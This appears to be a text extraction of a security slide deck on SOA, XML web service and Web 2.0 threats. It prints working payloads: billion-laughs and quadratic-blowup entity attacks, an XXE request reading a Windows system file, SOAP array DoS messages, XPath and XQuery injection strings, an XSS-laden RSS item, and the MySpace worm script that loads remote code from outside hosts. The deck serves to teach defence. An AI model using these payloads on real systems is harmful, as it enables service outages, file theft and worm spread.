MySQL
postgreSQL
Perl Ruby
Base support for
Web services
C/C++ Java
AxisSOAP4RSOAP::Lite gSOAP
Custom tools
perf analyzer
Web services
popular languages
Web service
instrumentation
tools
Other
Compilers
Vmware/Xen/KVM
ESB,
Message
Queuing
GWT
This part is
flexible
10. Some Typical Web 2.0 Server Environments
•LAMP = Linux, Apache, MySQL, PHP (or Perl or Python)
•MAMP = Mac OS X, Apache, MySQL, PHP
•LAMR = Linux, Apache, MySQL, Ruby
•WAMP = Microsoft Windows, Apache, MySQL, PHP
•WIMP = Windows, IIS, MySQL, and PHP
•WIMSA or WISA = Windows, IIS, Microsoft SQL Server, ASP
•WISC = Windows, IIS, SQL Server, and C#
•WISP = Windows, IIS, SQL Server, and PHP
•JOLT = Java, Oracle, Linux, and Tomcat
•STOJ = Solaris , Tomcat, Oracle and Java
11. SOA Business Drivers
Effective Reuse of IT Applications & Systems
• IT layers & applications
• Across organization & trust boundaries
Reduce IT Complexity
• Implementation (language/platform agnostic)
• Standards-based application interaction
Faster IT results at lower costs
• Easier Fellow Traveler & internal system integration
• Less “custom” software/adapters/B2B Gateways
• Easier to introduce new services
12. Why is security so important in SOA
•Drastic & Fundamental shift in Authentication &
Authorization models
•Real Business apps affected
•Non repudiation
•Externalization of application functionality and loss of
internal controls
•Next generation threats and new risks
13. Increasing Risks
Time-to-Market
Complexity is Growing
• Mixed Bag of Standards
• Interoperability, reuse, etc.
Increasing Business Risks
• Continued Rise in malicious activity
• Government scrutiny and
regulation pressures (HIPAA, GLBA,
SB1386, etc..)
• Liability precedents for security
incidents
The New Frontier
• Many of the attacks occur at the
Application/Service layers
Reported Vulnerabilities & Incidents
0
1,000
2,000
3,000
4,000
5,000
6,000
7,000
8,000
9,000
2000 2001 2002 2003 2004 2005 2006
0
50,000
100,000
150,000
200,000
250,000
300,000
350,000
400,000
Source: CERT & CSI/FBI Survey
Vulnerabilities Reported Incidents Reported
14. Old Attacks still valid
• Common Web Vulnerabilities
• Injection Attacks
• Buffer Overflow
• Denial of Service
The New Manipulation Attacks
• Entity and Referral Attacks
• DTD and Schema Attacks
The Next Generation Attacks
• Web Service Enabled Application Attacks
• Multi-Phase Attacks
XPATH Injection
XML/Web Services Attacks
Cross-Site Scripting in
Client Side XML
Documents
SAP/BAPI attacks
via
SO
AP
Endless loop Denial of
service Attacks
Schema RedirectionAttacks
SQL Injection in
XQuery
Entity Expansion Attacks
Command InjectionSOAP Attacks
15. SOA/XML Threat Model
Payload / Content threats
• Back End Target
– Ex: SQL Injection, BAPI Protocol attack, Universal Tunnel Misuse
• End User Target
– Ex: XSS, Malicious Active Content
XML Misuse/Abuse
– Ex: XML Injection, XPath Injection, XQuery Injection,
XML Structure Manipulation
– Ex: Entity Expansion, Referral Attacks, Schema Poisoning
Infrastructure Attacks
– Ex: Buffer overflow of Server
– Ex: DNS Poisoning for CA Server
16. XML/SOA Threat Model
Payload / Content threats
• Payload and Content threats use XML as a carrier for malicious code
and content.
• Many of the existing web and application layer threats can leverage
XML formats for delivery of the attack to targets.
• This category can be divided into two sub-categories:
– Back End Target: the attacker uses the XML flow/message to attack a
target application.
– End User Target: targets the browser or client application of the service
end user.
• One of the key differentiators of XML threats in general is that often
times the XML document is persistent and lives on beyond the
transaction.
– This leads to longer term threat as an attack can be delivered before the
actual attack occurs.
17. XML/SOA Threat Model
XML Misuse/Abuse
• Here XML structures and methods are misused to cause
malicious outcomes.
– As powerful a language XML and its uses are for the developer
and application infrastructure, it is equally powerful for the
attacker.
• In the Misuse example of XPath Injection:
– The attacker can leverage the advanced functionality of XPath
querying to perform more targeted and deeper invasions than its
Web cousin SQL injection.
– One example of this is the Blind XPath Injection attack
18. XML/SOA Threat Model
XML Structure Manipulation
• Malicious XML structures and formats.
• Most of these attacks use legitimate XML constructs in malicious ways.
– Two common examples of this are Entity attacks (both External and Expansion based) and
DTD/Schema based threats.
– The most common example of Entity threat is the Entity Expansion attack.
• The malicious XML message is used to force recursive entity expansion (or other repeated
processing) that completely uses up available server resources.
• The first example of this type of attack was the "many laughs" attack (some times called the
‘billion laughs’ attack).
<!DOCTYPE root [
<!ENTITY ha "Ha !">
<!ENTITY ha2 "&ha; &ha;">
<!ENTITY ha3 "&ha2; &ha2;">
<!ENTITY ha4 "&ha3; &ha3;">
<!ENTITY ha5 "&ha4; &ha4;">
...
<!ENTITY ha128 "&ha127; &ha127;">
]>
<root>&ha128;</root>
– In the above example, the CPU is monopolized while the entities are being expanded, and each
entity takes up X amount of memory - eventually consuming all available resources and
effectively preventing legitimate traffic from being processed.
19. XML/SOA Threat Model
XML Structure Manipulation
•The Schema Poisoning attack is one of the earliest reported forms of
XML threat.
• XML Schemas provide formatting and processing instructions for
parsers when interpreting XML documents.
• Schemas are used for all of the major XML standard grammars
coming out of OASIS.
• A schema file is what an XML parser uses to understand the XML’s
grammar and structure, and contains essential preprocessor
instructions.
•Because these schemas describe necessary pre-processing
instructions, they are very susceptible to poisoning.
20. XML/SOA Threat Model
Infrastructure Attacks
• Targeting the infrastructure that supports SOA and web services to
disrupt or compromise the services and
– Infrastructure misuse.
• An example of infrastructure target is to DoS the application server
hosting the services thus causing DoS to the service as well.
• A more complex example is DNS Poisoning of the CA server used by the
SOA infrastructure to validate signatures.
25. XQuery Injection
•XQuery is a SQL like language.
– It is also flexible enough to query a broad spectrum of XML information sources,
including both databases and documents.
•XQuery Injection is an XML variant of the classic SQL injection attack.
– Uses improperly validated data that is passed to XQuery commands to traverse and
execute commands that the XQuery routines have access to.
– Can be used to enumerate elements on the victim's environment, inject commands to
the local host, or execute queries to remote files and data sources.
– An attacker can pass XQuery expressions embedded in otherwise standard XML
documents or an attacker may inject XQuery content as part of a SOAP message
causing a SOAP destination service to manipulate an XML document incorrectly.
• The string below is an example of an attacker accessing the users.xml to
request the service provider send all user names back.
doc(users.xml)//user[name='*']
• The are many forms of attack that are possible through XQuery and are very
difficult to predict, if the data is not validated prior to executing the XQL.
Source: Steve Orrin
26. XPath Injection
•XPath is a language used to refer to parts of an XML document.
• It can be used directly by an application to query an XML document, or as part of
a larger operation such as applying an XSLT transformation to an XML document,
or applying an XQuery to an XML document.
•Why XPath Injection?
• Traditional Query Injection:
– ' or 1=1 or ''= '
• XPath injection:
– abc' or name(//users/LoginID[1]) = 'LoginID' or 'a'='b
• XPath Blindfolded Injection
– Attacker extracts information per a single query injection.
• The novelty is:
– No prior knowledge of XPath query format required (unlike “traditional” SQL Injection
attacks).
– Whole XML document eventually extracted, regardless of XPath query format used by
application
• http://www.packetstormsecurity.org/papers/bypass/Blind_XPath_Injection_20040518.pdf
Source: Amit Klein
http://www.webappsec.org/whitepapers.shtml
28. The Schema Poisoning attack
Here is an example of a XML Schema for a order shipping application:
<?xml version="1.0" encoding="ISO-8859-1" ?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="ship_order">
<xs:complexType>
<xs:sequence>
<xs:element name="order" type="xs:string"/>
<xs:element name="shipping">
<xs:complexType>
<xs:sequence>
<xs:element name="name" type="xs:string"/>
<xs:element name="address" type="xs:string"/>
<xs:element name="zip" type="xs:string"/>
<xs:element name="country" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>
…
</xs:schema>
An attacker may attempt to compromise the schema in its stored location and replace it with a
similar but modified one.
An attacker may damage the XML schema or replace it with a modified one which would then
allow the parser to process malicious SOAP messages and specially crafted XML files to inject OS
commands on the server or database.
29. The Schema Poisoning attack
Here is the schema after a simple poisoning
<?xml version="1.0" encoding="ISO-8859-1" ?>
<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="ship_order">
<xs:complexType>
<xs:sequence>
<xs:element name="order"/>
<xs:element name="shipping">
<xs:complexType>
<xs:sequence>
<xs:element name="name"/>
<xs:element name="address "/>
<xs:element name="zip"/>
<xs:element name="country"/>
</xs:sequence>
</xs:complexType>
</xs:element>
…
</xs:schema>
In this example of Schema Poisoning, by removing the various Schema conditions and
strictures the attacker is free to send a malicious XML message that may include content
types that the application is not expecting and may be unable to properly process.
Schema Poisoning may also be used to implement Man in the Middle and Routing detour
attacks by inserting extra hops in the XML application workflow.
Source: Steve Orrin & W3C XML Schema
www.w3.org/XML/Schema
30. Type: Data Theft/System Compromise
Target: XML Parsers
The attack on an Application Server
1. Find a web service which echoes
back user data such as the parameter "in"
2. Use the following SOAP request
3. And you'll get
C:WinNTWin.ini in the response (!!!)
How it works:
A. The App Server expands the entity “foo” into full text, gotten
from the entity definition URL - the actual attack takes place
at this phase (by the Application Server itself)
B. The App Server feeds input to the web service
C. The web service echoes back the data
...
<!DOCTYPE root [
<!ENTITY foo SYSTEM
"file:///c:/winnt/win.ini">
]>
...
<in>&foo;</in>
XML Entity Expansion/Referral Attack
Source: Amit Klein
31. Quadratic Blowup DoS attack
Type: Denial of Service
Target: XML Parsers
Attacker defines a single huge entity (say, 100KB), and references it many times
(say, 30000 times), inside an element that is used by the application (e.g. inside a
SOAP string parameter).
<?xml version=”1.0”?>
<!DOCTYPE foobar [<!ENTITY x “AAAAA… [100KB of them] … AAAA”>]>
<root>
<hi>&x;&x;….[30000 of them] … &x;&x;</hi>
</root>
Source: Amit Klein
32. DoS attack using SOAP arrays
Type: Denial of Service
Target: SOAP Interpreter
A web-service that expects an array can be the target of a DoS attack by forcing
the SOAP server to build a huge array in the machine’s RAM, thus inflicting a DoS
condition on the machine due to memory pre-allocation.
<soap:Envelope xmlns:soap=“ “>
<soap:Body>
<fn:PerformFunction xmlns:fn=“ “ xmlns:ns=“ “>
<DataSet xsi:type="ns:Array"
ns:arrayType="xsd:string[100000]">
<item xsi:type="xsd:string">Data1</item>
<item xsi:type="xsd:string">Data2</item>
<item xsi:type="xsd:string">Data3</item>
</DataSet>
</fn:PerformFunction>
</soap:Body>
</soap:Envelope>
Source: Amit Klein
33. Array href Expansion
Type: Denial of Service
Target: SOAP Interpreter
This attack sends an array built using a quadratic expansion of elements. This allows the array to be built and
sent relatively cheaply on the attacking side, but the amount of information on the server will be enormous.
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope… xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">
<soapenv:Header>
<input id="q100" xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="xsd:int[10]">
<int xsi:type="xsd:int">7</int>
<int xsi:type="xsd:int">7</int>
... and so on
</input>
<input id="q99" xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="SOAP-ENC:Array[10]">
<arr href="#q100" xsi:type="SOAP-ENC:Array" />
<arr href="#q100" xsi:type="SOAP-ENC:Array" />
... and so on
</input>
</soapenv:Header>
<soapenv:Body>
<ns1:getArray xmlns:ns1="http://soapinterop">
<input href="#q99" />
</ns1:getArray>
</soapenv:Body>
</soapenv:Envelope> Source CADS & Steve Orrin
http://www.c4ads.org
34. Unclosed Tags (Jumbo Payload)
Type: Denial of Service
Target: XML Parsers
This attack sends a SOAP packet to a web service. The actual SOAP packet sent to the web
service contains unclosed tags with the “mustUnderstand” attribute set to 1.
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
…
xmlns:ns2="http://xml.apache.org/xml-soap">
<soapenv:Header>
<input id="q0" mustUnderstand="1" xsi:type="SOAP-ENC:Array"
SOAP-ENC:arrayType="xsd:int[1]">
<i>
<i>
... and so on
Source CADS & Steve Orrin
http://www.c4ads.org
35. Name Size (Jumbo Payload)
Type: Denial of Service
Target: XML Parsers
This attack sends a SOAP packet that contains an extremely long element name to the web
service.
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
…
xmlns:ns2="http://xml.apache.org/xml-soap">
<soapenv:Header>
<input id="q0" mustUnderstand="1" xsi:type="SOAP-ENC:Array“
SOAP-ENC:arrayType="xsd:int[1]">
<Iasdfafajnasddjfhaudsfhoiwjenbkjfasdfiuabkjwboiuasdjbfaiasdfafajnasddjfhaudsfhoi
wjenbkjfasdfuabkjwboiuasdjbfa ... and so on>
Source CADS & Steve Orrin
http://www.c4ads.org
36. Attribute Name Size (Jumbo Payload)
Type: Denial of Service
Target: XML Parser, XML Interpreter
Similar to the other jumbo payload attacks. This attack uses large attribute names to attempt
to overwhelm the target. Many parsers have set buffer sizes, in which case this can overflow
the given buffer.
<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope…xmlns:ns2="http://xml.apache.org/xml-soap">
<soapenv:Header>
<input id="q0" xsi:type="SOAP-ENC:Array" SOAP-ENC:arrayType="xsd:int[1]"
z0z1z2z3z4z5z6z7z8z9(... and so on)="5">
<int xsi:type="xsd:int">10</int>
</input>
</soapenv:Header>
<soapenv:Body>
<ns1:getArray xmlns:ns1="http://soapinterop">
<item href="#q0" xsi:type="SOAP-ENC:Array" />
</ns1:getArray>
</soapenv:Body>
</soapenv:Envelope>
Source CADS & Steve Orrin
http://www.c4ads.org
37. Reading Blocking Pipes using External Entities
Type: Denial of Service
Target: XML Parsers
This attack abuses external entities by using them to read blocking pipes such as /de-v/stderr
on Linux systems. This causes the processing thread to block forever (or until the application
server is restarted). Repetitive use of this attack could cause a DoS once all threads are used
up.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE base [
<!ENTITY test0 SYSTEM "/dev/stderr">
<base>&test0</base>
…
Source CADS & Steve Orrin
http://www.c4ads.org
38. Repetitive Loading of Onsite Services Using Entities
Type: Denial of Service
Target: XML Parsers
This attack abuses external entities to repetitively load expensive onsite
services to effect a denial of service. This is extremely effective as it has
the result of the server doing the majority of the work while the attacker
just tells it which pages to load.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE base [
<!ENTITY test0 SYSTEM "http://192.168.2.183:8080/axis/ArrayTest.jws?wsdl">
<!ENTITY test1 SYSTEM "http://192.168.2.183:8080/axis/ArrayTest.jws?wsdl">
<!ENTITY test2 SYSTEM "http://192.168.2.183:8080/axis/ArrayTest.jws?wsdl">
<!ENTITY test3 SYSTEM "http://192.168.2.183:8080/axis/ArrayTest.jws?wsdl">
<base>&test0;&test1;&test2;&test3;</base>
…
Source CADS & Steve Orrin
http://www.c4ads.org
39. Other Threats
Threat Description
WSDL
Scanning
Web Services Description Language (WSDL) is an advertising mechanism for web services to dynamically describe
the parameters used when connecting with specific methods. These files are often built automatically using
utilities. These utilities, however, are designed to expose and describe all of the information available in a
method. In addition, the information provided in a WSDL file may allow an attacker to guess at other methods.
Coercive
Parsing
Exploits the legacy bolt-on - XML-enabled components in the existing infrastructure that are operational. Even
without a specific Web Services application these systems are still susceptible to XML based attacks whose main
objective is either to overwhelm the processing capabilities of the system or install malicious mobile code.
Content &
Parameter
Tampering
Since instructions on how to use parameters are explicitly described within a WSDL document, malicious users
can play around with different parameter options in order to retrieve unauthorized information. For example by
submitting special characters or unexpected content to the Web service can cause a denial of service condition or
illegal access to database records.
XML Virus &
X-Malware
Although looking like a real XML document, this XML Viruses contain malicious code that can be activated by
trying to parse the file
Oversize
Payloads &
XDOS
While an developers may try to limit the size of a document, there are a number of reasons to have XML
documents that are hundreds of megabytes or gigabytes in size. Parsers based on the DOM model are especially
susceptible to this attack given its need to model the entire document in memory prior to parsing
Replay
Attacks
A hacker can issue repetitive SOAP message requests in a bid to overload a Web service. This type of network
activity will not be detected as an intrusion because the source IP is valid, the network packet behavior is valid
and the HTTP request is well formed. However, the business behavior is not legitimate and constitutes an XML-
based intrusion. In this manner, a completely valid XML payloads can be used to issue a denial of service attack.
Routing
Detour
The WS-Routing specification provides a way to direct XML traffic through a complex environment. It operates by
allowing an interim way station in an XML path to assign routing instructions to an XML document. If one of these
web services way stations is compromised, it may participate in a man-in-the-middle attack by inserting bogus
routing instructions to point a confidential document to a malicious location. From that location, then, it may be
possible to forward on the document, after stripping out the malicious instructions, to its original destination.
Source: Pete Lindstrom, Research Director for Spire, January 2004
www.forumsystems.com/papers/Attacking_and_Defending_WS.pdf
40. Future & Next Generation Attacks
More Backend targeted Attacks
• Exploit Known Vulnerabilities in ERP, CRM, Mainframe, Databases
• Using Web Services as the Attack carrier
Emergence of Multi-Phase Attacks
• Leverage the distributed nature of Web Services & persistence of XML documents to
execute complex multi-target attacks
• Examples:
– DNS Poisoning for CA Server + Fraudulently signed XML transactions
– Specially crafted Malware delivery methods using XML
– Advanced Phishing and Pharming using XSS in XML
Universal Tunnel Abuse
• Universal tunnel is where an attacker or as in many cases a insider with ‘good’
intentions uses XML and Web Services to expose internal or blocked protocols to the
outside.
• XML Web Services will implement existing network protocols leading to misuse and
piggybacking of:
– FTP/Telnet/SSH/SCP/RDP/IMAP…
Web 2.0 AttacksWeb 2.0 Attacks
41. Web 2.0 and RIA (Rich Internet Applications)
•AJAX Vulnerabilities
•RSS based Threats
•XSS Worms – Sammy, QT/MySpace
43. AJAX Vulnerabilities: Information Leakage
The JavaScript in the Ajax engine traps the user commands and makes
function calls in clear text to the server.
Examples of user commands:
• Return price for product ID 24
• Return valid cities for a given state
• Return last valid address for user ID 78
• Update user’s age in database
Function calls provide “how to” information for each user command that is sent.
• Is sent in clear text
The attacker can obtain:
• Function names, variable names, function parameters, return types, data types,
and valid data ranges.
Source: Billy Hoffman Lead Security Researcher
for SPI Dynamics (www.spidynamics.com)
44. AJAX Vulnerabilities:
Repudiation of Requests and Cross-Site Scripting
Browser requests and Ajax engine requests look identical.
• Server are incapable of discerning a request made by JavaScript and a
request made in response to a user action.
• Very difficult for an individual to prove that they did not do a certain action.
• JavaScript can make a request for a resource using Ajax that occurs in the
background without the user’s knowledge.
– The browser will automatically add the necessary authentication or state-keeping
information such as cookies to the request.
• JavaScript code can then access the response to this hidden request and then
send more requests.
This expanded JavaScript functionality increases the damage of a
Cross-Site Scripting (XSS) attack.
Source: Billy Hoffman Lead Security Researcher
for SPI Dynamics (www.spidynamics.com)
45. AJAX Vulnerabilities: Ajax Bridging
The host can provide a Web service that acts as a proxy to forward traffic
between the JavaScript running on the client and the third-party site.
– A bridge could be considered a “Web service to Web service” connection.
– Microsoft’s “Atlas,” provide support for Ajax bridging.
– Custom solutions using PHP or Common Gateway Interfaces (CGI) programs can also
provide bridging.
An Ajax bridge can connect to any Web service on any host using protocols
such as:
– SOAP & REST
– Custom Web services
– Arbitrary Web resources such as RSS feeds, HTML, Flash, or even binary content.
An attacker can send malicious requests through the Ajax bridge as
well as take advantage of elevated privileges often given to the
Bridge‘s original target.
Source: Billy Hoffman Lead Security Researcher
for SPI Dynamics (www.spidynamics.com)
46. RSS Feeds: Attack Delivery Service
RSS Feeds provide links and content to RSS enabled apps and
aggregators
Malicious links and content can be delivered via the RSS method
Can be used to deliver XSS and XML Injection attacks
Can be used to deliver malicious code (Both Script and encoded
Binary)
Source: Steve Orrin
47. Malicious RSS Example
<rdf:RDF
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns="http://purl.org/rss/1.0/"
xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel rdf:about="http://www.xml.com/cs/xml/query/q/19">
<title>XML.com</title>
<link>http://www.xml.com/</link>
<description>XML.com features a rich mix of information and services for the XML community.</description>
<language>en-us</language>
<items>
<rdf:Seq>
<rdf:li rdf:resource="http://www.acme.com/srch.aspx?term=>'><script>document.location.replace('stam.htm');</script>&y="/>
<rdf:li rdf:resource="http://www.xml.com/pub/a/2002/12/04/som.html"/>
</rdf:Seq>
</items>
</channel>
<item rdf:about="http://www.xml.com/pub/a/2002/12/04/normalizing.html">
<title>Normalizing XML, Part 2</title>
<link>http://www.xml.com/pub/a/2002/12/04/normalizing.html</link>
<description>In this second and final look at applying relational normalization techniques to W3C XML Schema data modeling, Will Provost discusses
when not to normalize, the scope of uniqueness and the fourth and fifth normal forms.</description>
<dc:creator>Will Provost</dc:creator>
<dc:date>2002-12-04</dc:date>
</item>
</rdf:RDF>
Source: Steve Orrin
48. XSS Worms
Using a website to host the malware code, XSS worms and viruses take control over a web
browser and propagate by forcing it to copy the malware to other locations on the Web to
infect others.
For example, a blog comment laced with malware could snare visitors, commanding their
browsers to post additional infectious blog comments.
– XSS malware payloads could force the browser to send email, transfer money, delete/modify data,
hack other websites, download illegal content, and many other forms of malicious activity.
On October 4, 2005, The Samy Worm, the first major worm of its kind, spread by
exploiting a persistent Cross-Site Scripting vulnerability in MySpace.com’s personal profile
web page template.
Source Jeremiah Grossman CTO WhiteHat Security
http://www.whitehatsec.com
http://www.whitehatsec.com/downloads/WHXSSThreats.pdf
49. MySpace QT Worm
MySpace allows users to embed movies and other multimedia into their user profiles.
Apple’s Quicktime movies have a feature known as HREF tracks, which allow users to embed a
URL into an interactive movie.
The attacker inserted malicious JavaScript into this Quicktime feature so that when the movie
is played the evil code is executed.
javascript:
void((
function() {
//create a new SCRIPT tag
var e=window.document.createElement('script');
var ll=new Array();
ll[0]='http://www.daviddraftsystem.com/images/';
ll[1]='http://www.tm-group.co.uk/images/';
//Randomly select a host that is serving the full code of the malware
var lll=ll[Math.floor(2*(Math.random()%1))];
//set the SRC attribute to the remote site
e.setAttribute('src',lll+'js.js');
//append the SCRIPT tag to the current document. The current document would be whatever webpage
//contains the embedded movie, in this case, a MySpace profile page. This causes the full code of the malware to
execute.
window.document.body.appendChild(e);
})
Source code from BurntPickle http://www.myspace.com/burntpickle)
Comments and formatting by SPI Dynamics (http://www.spidynamics.com)
50. Evolving Security Threats
Reconnaissance
Sniffing
Masquerading
Insertion
Injection
xDoS AttacksSophistication of Tools
Detect Web
Services
Capture Web
Services Traffic
Stealth Session
Hijack
Insert Malicious
Traffic
Disruption of
Service
Network Scanners
WSDL Scanning
Packet &
Traffic Sniffers
Routing Detours
Replay Attacks
XSS in XML
XPath Injection
RSS Attacks
AJAX Attacks
Quadratic Blowup
Schema Poisoning
Web2.0 Worms
Multi-Phase/
Universal Tunnel
Targeted Viruses,
Trojans,
Redirectors,
XML-CodeRed
????
52. De-Perimeterization
XML, Web Services & Web 2.0 Apps are more than just different
classes of network traffic
XML, Web Services & Web 2.0 represent a crucial paradigm shift of the
network perimeter.
Applications and Data Reside EVERYWHERE!
53. Unprotected Perimeter
Internet, Intranet
and/or Extranet
Perimeter
& DMZ
Web (HTTP)
Distribution
Layer
Application (XML)
Web Services Layer
(XML
Traffic)
NIDP
Netegrity
Oracle
DB
Layer
VPN
Termination
SSL
Termination
Firewall
SOAP
TCP/IP
Network Threats
54. Evolution of Web Services Security
Proxy solutions:
WS Security Gateway
SOAP Gateway
SOA Gateway
XML Firewall
TrustEnablementThreatMitigation
1st Gen 2nd Gen
XML Transparent IPS
(Threat Prevention)
Near-zero provisioning
Wire-speed performance
Streaming XML threat prevention
Known & unknown threats
Heuristics, Anomaly, Policy
based
XML Proxy Trust Gateway
(Trust Enablement)
Web services AAA
Integration with IA&M
Integrity & Confidentiality
Message Level Security
Centralized security
policy
NetOpsSecOpsAppOps
55. Internet, Intranet
and/or Extranet
Perimeter
& DMZ
Web (HTTP)
Distribution
Layer
Application (XML)
Web Services Layer
(XML
Traffic)
Netegrity
Oracle
DB
Layer
XML Proxy
Trust Gateway
XML
Network Threats
XML Threat Mitigated! XML Authenticated & Encrypted!
Internet, Intranet
and/or Extranet
Perimeter
& DMZ
(XML
Traffic)
Transparent
XML IPS
XML / Web Services Security:
2nd Generation
• Functional boundary split
• Internal and External threat protected
• Transparent Threat Prevention
• Application-aware Trust Assurance
56. Summary
We are in a rapidly changing environment with SOA going mainstream and Web
2.0 sites/apps in use by millions.
As with every technology evolution and revolution new and continuously evolving
threats abound. These threats equally target our systems, data, and users.
We as an industry need to collaborate to identify new threats and use the Threat
Model as a means to easily classify and inform our customers, partners, IT and
developers on the attacks and how to mitigate them.
Finally we need to understand that SOA and Web 2.0 are pervasive throughout the
enterprise and in use at the client, therefore we must address these issues early in
the SDL at all of the target points.